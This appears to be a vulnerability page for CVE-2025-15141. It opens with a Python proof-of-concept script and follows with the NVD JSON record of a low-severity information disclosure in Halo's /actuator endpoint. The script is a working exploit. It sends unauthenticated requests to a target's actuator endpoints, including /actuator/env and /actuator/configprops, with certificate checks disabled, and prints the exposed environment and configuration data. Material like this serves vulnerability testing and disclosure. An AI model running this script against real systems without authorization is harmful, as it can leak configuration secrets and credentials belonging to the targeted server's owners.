CVE-2025-15141

#!/usr/bin/env python3 """ CVE-2025-15141 PoC - Halo Actuator Information Disclosure This PoC demonstrates the information disclosure vulnerability in Halo's /actuator endpoint. Note: This code is for educational and authorized testing purposes only. """ import requests import sys import json TARGET_HOST = "http://target-server.com" # Replace with target URL ACTUATOR_ENDPOINTS = [ "/actuator/env", "/actuator/configprops", "/actuator/beans", "/actuator/health", "/actuator/info" ] def check_actuator_vulnerability(target): """ Check if the target is vulnerable to Actuator information disclosure. """ print(f"[*] Testing target: {target}") print("=" * 60) vulnerable = False for endpoint in ACTUATOR_ENDPOINTS: url = f"{target}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"\n[!] Found accessible endpoint: {endpoint}") print(f"[!] Status Code: {response.status_code}") try: data = response.json() print(f"[+] Response Preview:\n{json.dumps(data, indent=2)[:500]}...") vulnerable = True except: print(f"[+] Response (text): {response.text[:500]}") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n" + "=" * 60) if vulnerable: print("[!] Target appears to be VULNERABLE to CVE-2025-15141") print("[!] Actuator endpoints are accessible without authentication") else: print("[-] Target does not appear to be vulnerable") return vulnerable if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] check_actuator_vulnerability(TARGET_HOST)

{"cve": {"id": "CVE-2025-15141", "sourceIdentifier": "[email protected]", "published": "2025-12-28T15:15:41.813", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Halo up to 2.21.10. This issue affects some unknown processing of the file /actuator of the component Configuration Handler. Executing a manipulation can lead to information disclosure. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:halo:halo:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.21.10", "matchCriteriaId": "2A29BF3B-F0A5-4682-8FFB-46EA7168FBFF"}]}]}], "references": [{"url": "https://github.com/SECWG/cve/issues/9", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.338519", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338519", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715235", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}